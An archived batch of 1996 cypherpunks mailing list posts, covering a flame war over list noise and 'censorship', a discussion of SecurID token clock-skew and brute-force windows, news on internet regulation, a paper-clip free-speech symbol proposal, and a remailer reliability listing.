From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Mon, 1 Jan 1996 15:15:26 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Can We Cut the Crap?
In-Reply-To: <NoVZgD6w165w@bwalk.dm.com>
Message-ID: <199601010637.AAA22761@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> tcmay@got.net (Timothy C. May) writes:
> > There is no point in the back-and-forth of insults, "Dr. Fred is a loon,"
> > "Alice is Detweiler," and other such nonsense. If you don't want to read
> > the comments of Fred Cohen, Dimitri Vulis, Alice whatever,
> > Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete
> > them immediately, read them briefly, whatever.
> 
> Or Chris Shalutis, or Ed Carp, or Perry Metzger...
> 
> Too bad majordomo@toad.com can't be instructed not to send contributions from
> certain folks to certain other folks.  I guess I'll have to figure out how
> to use procmail with this thing after all.

Hey, Dimitri?  That's what it's *for*!  This is not about censorship, or 
is it?  Is that what you're suggesting?

No one is forcing you to read anything I, or anyone else, says.  If you 
don't like it, the 'd' key is somewhere on your keyboard.  Or is that too 
much manual labor for you?  Grrr...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOeBFCS9AwzY9LDxAQHDxwQApbzrRLJQTcLshlPGx5qCUNYNfFBeloYY
7o0ULL3+dGs+bjE+VsGy+taEBnWp1L1i5BK4NGo44dEV9SwkndnE5bCalS3vCIsd
YidfhM8nfDa9+e93Uh7VM63ZLVxi6F2SBvN6vcfnmxC7V9LN/b+jrvUPbJG2tVMx
D64Dg2Zd5Jk=
=lIHF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 1 Jan 1996 14:17:25 +0800
To: cypherpunks@toad.com
Subject: Ah, the future...
Message-ID: <Pine.BSD.3.91.960101010107.5448B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  12 31 95 Associated Press reports: 
 
     Ah, the future ...
   
     At least part of what will happen in the coming year 
     seems clear.  Cyberspace will be regulated -- kicking 
     and screaming -- and the court battles over free speech 
     will begin.  "It's going to throw the Internet into a 
     state of uncertainty for several years," said [Bob] Smith 
     [of Interactive Services Association]. 
 
 
  You may recall the question I asked in an earlier message: 
 
     And when the State DECIDES...? 
 
 
  But that's all right... 
 
     Despite that, business growth on the net will begin to 
     catch up with the phenomenal increase in accounts. 

 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The newsstory's headline?  YEAR OF THE INTERNET: 
  What a tangled web we weave.  Its dateline?  (Dec 31, 1995 - 
  00:23 EST).  Accessed at?  Nando News (www.nando.net). 
  Online filename?  info306_3.html 
  
  That message? 

  Date: Wed, 22 Nov 1995 04:16:50 -0500 (EST) 
  From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com> 
  To: cypherpunks@toad.com 
  Subject: Secrets of the Internet 
 
  This critical essay, "Ah, the future..."  was composed 
  12 31 95. 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Mon, 1 Jan 1996 14:57:35 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Australian "calculatorcard"
Message-ID: <01HZH81RU4DE95P4B0@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

From: Vin McLellan             \ Internet:    (vin@shore.net)

> it's Pretty Good
>(tm) security, but like anything not biometric, it is vulnerable to
>black-bag attacks. physical possession being all that is required.

VM>        Actually, all ACE/Server or ACE software modules _require_ a
VM> user-memorized PIN.  Physical possession of a stolen token is not
VM> enough to gain illicit access.

>if
>you know the algorithm and the serial number of the card and the
>time, even that isn't necessary.

VM>         Bleep!  Earth to amp! Check your voltage, lately?  The token's
VM> serial number has nothing whatsoever to do with the generation of a
VM> SecurID's PRN token-code.

hmmmm, let me see... yup. you are right. voltage low. give me a
second to plug back in...

VM> and distribution.  The serial number stuck to the back of a SecurID
VM> after it is programmed with its secret key -- a unique PRN
VM> "significantly longer" than 56 bits -- but they are not the same
VM> thing.  The cpu in a SecurID doesn't even "know" the serial number
VM> stuck on the back of the token.

VM>         (It would be Pretty Stupid <TM> to glue or emboss a secret on
VM> the back of the damn token, wouldn't it?)  I should note that Alan is
VM> just regergitating one of the most widely circulated  rumors about
VM> SecurIDs -- which like any popular crypto device attracts a lot of
VM> wiLd & w00ly speculation.

actually, i was speaking pretty much off the top of my head. it's
been a while since i registered it, but all i basically had to tell
the server the first time i used it was the s/n. and yes, i think it
would be Pretty Damn Stupid to have the s/n have anything to do with
the actual seed or pin. 

VM>         Getting the algorithm for SDI's one-way hash is no big deal,
VM> given that it sits in software in thousands of SDI customer
VM> installations, protected only by contract and trade secret status. 
VM> (The integrity of the product -- the unpredictability of the
VM> token-code PRN series, and the secrecy of a specific token's seed or
VM> key -- rightly depends cryptographic strength of the hash, not the
VM> secrecy of the algorithm.)  Getting a token-specific secret key would
VM> hopefully be a much greater challenge.

one would certainly hope so. <g> personally, i like the card. it
offers pretty good security and thus gives me remote access to
systems my employer would otherwise laugh in my face for access to
(and did, more than once before we got these things). its main
weakness would be a black bag job where someone gains physical
posession. at that point, all bets on its securty are off for obvious
reasons. luckily, because of the nature of the device, i can simply
report it as stolen and it quickly becomes a rather worthless piece
of silicon.


amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
December 31, 1995   22:15





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Mon, 1 Jan 1996 14:57:23 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: Australian "calculatorcard"
Message-ID: <01HZH81Y0DKI95P3WV@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

From: David Lesher             \ Internet:    (wb8foz@nrk.com)

To:   amp                      \ Internet:    (alan.pugh@internetmci.com)
cc:   Cees de Groot            \ Internet:    (c.degroot@inter.nl.net)
cc:   cypherpunks              \ Internet:    (cypherpunks@toad.com)

Subject: Re: Australian "calculatorcard"

> sounds like the card i use for remote dialup to certain non-public
> systems i use at work. it has a six digit number on the front that
> changes every 60 seconds. 

DS> Do these card systems use a window to handle clock-slip?

i'm not sure. i would image so.

DS> I'd think you could have the server safely accept # N, N-60 sec, and
DS> N+60 seconds; and adjust the server's idea of your card's clock speed
DS> from that.

DS> What new risk would that create?

i would figure the server would give a minute or so for slippage.
basically the risk is that it would give someone 3 minutes to do a
brute force attack rather than one. if you have decent security on
the server side, i.e., disallow the card for 5 minutes or more after 3
or so failed attempts, brute attacks would be minimized. however, if
the actual window for a single code is 3 minutes, that increases your
chance of hitting it as 3 separate numbers would be valid for a given
card at any given time.


amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
December 31, 1995   21:59





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 1 Jan 1996 08:45:25 +0800
To: cypherpunks@toad.com
Subject: first germany, now china
Message-ID: <199601010025.BAA04537@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


           BEIJING (AP) _ China is planning measures to stop obscene or
harmful material from entering the country via the Internet, its
official news agency reported Sunday.
           The Communist Party and the State Council, China's cabinet,
recently ordered such measures after learning that ``pornographic
and detrimental information'' had been disseminated electronically
in China, the Xinhua News Agency said.
           The report said China intended to use the Internet to promote
the exchange and transfer of technology and scientific information,
while at the same time blocking what it sees as negative
influences.
           It did not provide further details.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: groundfog@alpha.c2.org
Date: Mon, 1 Jan 1996 11:34:18 +0800
To: cypherpunks@toad.com
Subject: Re: For the New Year: A Symbol for Information Freedom
Message-ID: <199601010311.WAA12624@mail.FOUR.net>
MIME-Version: 1.0
Content-Type: text/plain


In talk.politics.crypto, ptupper@direct.ca (Peter Tupper) wrote:

>     A Symbol for Information Freedom

>     by Peter Tupper <ptupper@direct.ca>

>     1996 is off to a discouraging start when it comes to the
>future of information freedom.  The American Congress seems
>determined to impose censorship on the Internet.  The legal
>status of strong dual-key cryptography is still in debate. 
>Telephone companies, cable TV services and publishing services
>are all eagerly trying to seize control of the Internet and
>eliminate the many-to-many nature of the medium.  The accidental
>wonder that is the Internet seems to be threatened on all sides,
>in danger of being destroyed or denatured before reaching its
>potential. 

>     My proposal is only a small contribution to the solutions to
>this problem.  I believe a symbol is needed; a simple yet
>recognizable item that will communicate to others that you are:
>     -for freedom of speech and expression in all realms,
>particularly via computer mediated communications.
>     -against the imposition of arbitrary community standards by
>centralized authority on communications.
>     -for making access to communications available to everyone.
>     -against the violation of individual privacy by wiretapping,
>intercepting computer communications, compiling dossiers by
>government or commercial organizations or other forms of
>surveillance.
>     -for making strong, dual-key encryption programs without
>back-doors available to the public.
>     -against building surveillance measures into communications
>and financial infrastructures.  
>     -for a future of communications that is by, for and of the
>people, not the state or the market.

>     The symbol I have chosen is the paper clip.  Why a paper
>clip?
>     There are many reasons:

>     Pragmatic:  Paper clips are readily available for
>practically nothing, all over the world.  They can be applied to
>collars, lapels, scarves, pocket edges, suspenders and neck ties
>without damaging them and without risk of the pin breaking the
>skin.  
>     Aesthetic:  The paper clip is a simple, elegant design that
>is easily recognized the world over.  It can be rendered in many
>colors or plated with precious metals.
>     Symbolic:  The paper clip is a simple but effective piece of
>technology.  An individual uses it to bundle together documents
>from disparate sources to create a unified document upon a given
>subject, which may be dismantled and remade for another topic. 
>Furthermore, a paper clip may be bent out of its regular shape
>and used as an improvised tool for any number of purposes.
>     Historic:  During the German occupation of Norway in World
>War II, Norwegians wore paper clips on their collars as a sign of
>solidarity against the invaders.
>     Commercial:  While anybody can obtain a plain paper clip
>with little trouble, funds for Information Freedom can be raised
>by marketing electroplated or designer paper clips.  

>     The cause of awareness of and activism about AIDS had a
>simple, readily recognized symbol, the folded red ribbon.  Just
>as every celebrity who wears a red ribbon, no matter how trite
>and self-promoting it is, is a reminder to those watching that
>AIDS is happening and that many people are concerned,
>celebrities appearing at the Academy Awards or Grammies with a
>designer, gold-plated paper clip on their outfit reminds the
>world that information freedom is under fire and that people are
>concerned.  It will make the Internet community a visible reality
>in the public sphere.  It will bring these issues into the public
>eyes, and give those involved a rallying symbol.  It will make a
>small difference, but it will contribute to the greater good.

>     

Advertising couldn't hurt.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 1 Jan 1996 23:06:58 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199601011450.GAA17007@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: all of the "ek" tags have been verified correct. Apologies to
those who were inconvenienced by incorrect "ek" tags in the past.

Last update: Mon 1 Jan 96 6:49:52 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
c2       remail@c2.org                    +.-+++-.-***    47:18  99.99%
hacktic  remailer@utopia.hacktic.nl       *****+******     8:12  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           #*#+#+##++*#     3:50  99.98%
replay   remailer@replay.com              *****+**+***     6:58  99.98%
pamphlet pamphlet@idiom.com                     +--++*  1:32:43  99.97%
ford     remailer@bi-node.zerberus.de     -+-++-+--+++  2:16:40  99.97%
hroller  hroller@c2.org                   #.-##+-.-#*#    23:11  99.94%
flame    remailer@flame.alias.net         +.-----+-++   2:35:44  99.93%
spook    remailer@valhalla.phoenix.net    *.--+-.--.-+  4:33:40  99.88%
amnesia  amnesia@chardos.connix.com       -++---------  3:31:08  99.85%
rmadillo remailer@armadillo.com           +++++++ ####    15:42  99.81%
mix      mixmaster@remail.obscura.com     __.------+-   6:43:02  99.77%
extropia remail@extropia.wimsey.com       --.--------   5:40:08  99.69%
wmono    wmono@valhalla.phoenix.net        * **+ *** *    13:04  98.86%
penet    anon@anon.penet.fi               --- *+++++++  3:07:11  98.86%
alumni   hal@alumni.caltech.edu           +###*++*-- #    31:22  98.14%
vishnu   mixmaster@vishnu.alias.net        ----- -  -*  1:22:32  98.12%
portal   hfinney@shell.portal.com         #####+##-  #    26:19  97.36%
shinobi  remailer@shinobi.alias.net       -+++++++++    1:33:37  90.69%
rahul    homer@rahul.net                  -+##*+*+####     5:20  99.99%
tjava    remailer@tjava.com                   #+#*#*#       :40  89.19%
ecafe    cpunk@remail.ecafe.org           -#___.##     16:32:15  67.10%
gondolin mix@remail.gondolin.org          -*+..*       15:03:39  46.77%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmatk@tscm.com (James M. Atkinson, Comm-Eng)
Date: Tue, 2 Jan 1996 02:48:52 +0800
To: cypherpunks@toad.com
Subject: TSCM.COM Counter Surveillance, Privacy,  & Security Page
Message-ID: <v01530501ad0d9939620f@[205.161.57.127]>
MIME-Version: 1.0
Content-Type: text/plain


Happy New Year!!!!!

TSCM
Technical Surveillance Counter Measure - new materials finished...

Check it out...

http://www.tscm.com/

New section on TSCM test equipment
New section on TSCM training and career paths

Coming Soon,
TSCM Hand tools
TSCM and Technical Surveillance books

- James M. Atkinson     "...shaken, not stirred"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 1 Jan 1996 18:01:40 +0800
To: amp <Alan.Pugh@internetMCI.COM>
Subject: Re: Australian "calculatorcard"
In-Reply-To: <01HZH81Y0DKI95P3WV@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <Pine.BSD.3.91.960101093049.3196B-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 1 Jan 1996, amp wrote:

> DS> I'd think you could have the server safely accept # N, N-60 sec, and
> DS> N+60 seconds; and adjust the server's idea of your card's clock speed
> DS> from that.
> 
> DS> What new risk would that create?
> 
> i would figure the server would give a minute or so for slippage.
> basically the risk is that it would give someone 3 minutes to do a
> brute force attack rather than one. if you have decent security on
> the server side, i.e., disallow the card for 5 minutes or more after 3
> or so failed attempts, brute attacks would be minimized. however, if
> the actual window for a single code is 3 minutes, that increases your
> chance of hitting it as 3 separate numbers would be valid for a given
> card at any given time.
> 

    START <attila>

	Bank wire systems over the SWIFT private wire are time synched
    much closer than a minute although I have never been given more of
    an answer than that.

	given that you have a tolerable high speed link, and are not
    dealing with an overloaded concentrator at the telco -> carrier
    inferface or an overloaded server, I believe you can solve most
    of the windowing problem by:

	1.  client sends number and time to server
	2.  server send what it thinks as time to client
	3.  client can place a delta on servers time for local time
	4.  enter PIN, etc. and you are working with a much narrower
	    window.

	the security risk does not appear to increase from the 
    exchange times and entering the PIN and letting the normal
    progression go forward once v. just monitoring a series of
    successive verifications trying to effect a pattern in the
    hash.

	Secure-ID seems to be a one-time time-based single use
    pad; to me, using a time exchange initiator has the advantage
    of a smaller window, and fewer problems with client machines
    running on strange times which require sloppier time windows.

    END <attila>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Jan 1996 23:21:24 +0800
To: cypherpunks@toad.com
Subject: 96R_azz
Message-ID: <199601011504.KAA14190@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-1-96: NYP:

   Denise Caruso offers '96 resolutions on Nscp/Aol bugs,
   Web rubes, daft pols, Gates' dogs, crypto zip, Apple
   rot, W$ dupes.

   96R_azz













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Tue, 2 Jan 1996 01:41:24 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Can We Cut the Crap?
In-Reply-To: <uD61gD18w165w@bwalk.dm.com>
Message-ID: <199601011646.KAA23871@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> There are people on this mailing list who appear to have very little technical
> expertise (e.g., can't figure out how an anonymous remailer works), contribute
> nothing but silly puerile flames to the discussion, and whose harassment has
> caused Fred to stop contributing. They've deprived Fred of his right to spreak
> and readers like me of our right to listen. This is censorship by bullying.

Now there you are wrong.  No one forced Fred to stop posting to the list
(I noticed that I just got a posting from him just yesterday, so he may
have stopped since then), but no one deprived Fred of his right to speak. 
I don't see Eric Hughes standing up and saying "Fed, stop posting to the
list", and I certainly note that his postings are getting through to the
list.  So, your statements regarding people harassing Fred, causing him to
stop posting, etc., are just eyewash and an attempt to emotionally
manipulate your audience by calling it "censorship". 
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOgP1yS9AwzY9LDxAQG2tgQAqpoTneK0dSqK7VKWBUZZcS710KOnWLlC
j1opYymkAzc4dhNUw7NSqwrEm51+lty7xxrXuqDSBrBJp5fkI5sn81Bg3SIN2JFx
iIKyvo57oOe/jOoJp7ONmqCpnPvsJbar0T+q7eHXdZCGM4VRSLVrqDxwMg4NnYE4
JFxgqp2qBDo=
=09VD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve14571@aol.com
Date: Tue, 2 Jan 1996 00:29:56 +0800
To: cypherpunks@toad.com
Subject: Who sent me this message?
Message-ID: <960101111333_28712586@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone from this list sent me a message encrypted with the international
version of PGP 2.6.2.  Unfortunately, my system crashed and lost the email
address...  Plaintext of the message follows:

Hi Stephen,

>Me too 8^)  This is a 2047 bit key (I think big)
:-) As I can see. How did you generate this key? Are you using a
special version of PGP?

Maybe something about myself to start with:
I'm from Belgium (that small spot between France, Germany and the
Netherlands). I work in a bank (no, this does not mean that I'm
swimming in money!) as a system engineer. We work mainly with A-Series
mainframes from UNISYS. At home I spent some time on the internet, my
PC, reading a good book and last but not least having a beer with my
friends.

That's it for now, looking forward to hear from you again.

Happy New Year!

Luc

Whoever sent me this message please write back, and send a public key so that
I can respond.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gordon Campbell <campbelg@limestone.kosone.com>
Date: Tue, 2 Jan 1996 01:36:00 +0800
To: cypherpunks@toad.com
Subject: Re: Can We Cut the Crap?
Message-ID: <2.2.32.19960101164513.006a3e98@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 PM 12/31/95 -0800, tcmay@got.net (Timothy C. May) wrote:
>
>Really, the S/N ratio is approaching all-time lows, even for the Silly
>Season of Xmas. A week or so ago there was a massive flame war involving
>insults and counter-insults--I returned from my Xmas vacation to find the
>list melting down. Now, a week later, a new flamewar has erupted.

As a lurker on the list, I'd like to second this opinion. The cypherpunks
list is held up to be this almighty oracle of cryptographic information.
Yet, every time I subscribe to it (this is the fourth time in a year) I have
to wade through irrelevant personal attacks and various other rubbish. I
mean, really. This is worse than Fidonet.

However, I suppose that with any gathering of (mostly) intelligent, liberty
and privacy minded people, there are likely to be clashes of one sort or
another. If the anonymous twits will grow up and stop stirring things up,
maybe the rest of us can learn something.

Just my $0.02

-----
Gordon R. Campbell, Owner - Mowat Woods Graphics
P.O. Box 1902, Kingston, Ontario, Canada  K7L 5J7
Ph: (613) 542-4087   Fax: (613) 542-1139
2048-bit PGP key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Tue, 2 Jan 1996 02:40:19 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Can We Cut the Crap?
In-Reply-To: <suc2gD21w165w@bwalk.dm.com>
Message-ID: <199601011751.LAA27876@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> 
> "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> > > There are people on this mailing list who appear to have very little techni
> > > expertise (e.g., can't figure out how an anonymous remailer works), contrib
> > > nothing but silly puerile flames to the discussion, and whose harassment ha
> > > caused Fred to stop contributing. They've deprived Fred of his right to spr
> > > and readers like me of our right to listen. This is censorship by bullying.
> >
> > Now there you are wrong.  No one forced Fred to stop posting to the list
> > (I noticed that I just got a posting from him just yesterday, so he may
> > have stopped since then), but no one deprived Fred of his right to speak.
> > I don't see Eric Hughes standing up and saying "Fed, stop posting to the
> > list", and I certainly note that his postings are getting through to the
> > list.  So, your statements regarding people harassing Fred, causing him to
> > stop posting, etc., are just eyewash and an attempt to emotionally
> > manipulate your audience by calling it "censorship".
> 
> Ed, I've met Eric Hughes.  You're no Eric Hughes.

So?  How do you know?  Your comment made absolutely no sense at all.

> The crypto people on this mailing list have asked people repeatedly to
> curtail non-crypto-related postings (most recently, Tim May, who started
> this thread). This is not censorship. The sliencing of Fred Cohen by a lynch
> mob of non-technicals (who, e.g., send e-mail twice) is a disturbing example
> of censorship.

Crap.  If Fred doesn't want to post, that's his choice (as he has 
indicated in private mail to me), but it's not your call to conclude that 
he is being "censored".
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOgfCCS9AwzY9LDxAQEIHwP/QBvrw/2ePyPqPzs8UcZ3COomXwtYpgBz
8RWnIIdNbEqkf0U/v+OWoeb1cMAPdvyo4CmYLfRlaroSaCGGzfcCDRp3GOtq6zEO
njk1QPAoSb5pxT6zABGPO3ogeBbGB3E5a5AKy+yQrc2MpmzFN0r8EOQ1CPReF3c0
YmOgPbn/b5o=
=EJk4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 2 Jan 1996 02:16:24 +0800
To: cypherpunks@toad.com
Subject: Re: Can We Cut the Crap?
In-Reply-To: <199601011646.KAA23871@dal1820.computek.net>
Message-ID: <suc2gD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net> writes:
> > There are people on this mailing list who appear to have very little techni
> > expertise (e.g., can't figure out how an anonymous remailer works), contrib
> > nothing but silly puerile flames to the discussion, and whose harassment ha
> > caused Fred to stop contributing. They've deprived Fred of his right to spr
> > and readers like me of our right to listen. This is censorship by bullying.
>
> Now there you are wrong.  No one forced Fred to stop posting to the list
> (I noticed that I just got a posting from him just yesterday, so he may
> have stopped since then), but no one deprived Fred of his right to speak.
> I don't see Eric Hughes standing up and saying "Fed, stop posting to the
> list", and I certainly note that his postings are getting through to the
> list.  So, your statements regarding people harassing Fred, causing him to
> stop posting, etc., are just eyewash and an attempt to emotionally
> manipulate your audience by calling it "censorship".

Ed, I've met Eric Hughes.  You're no Eric Hughes.

The crypto people on this mailing list have asked people repeatedly to
curtail non-crypto-related postings (most recently, Tim May, who started
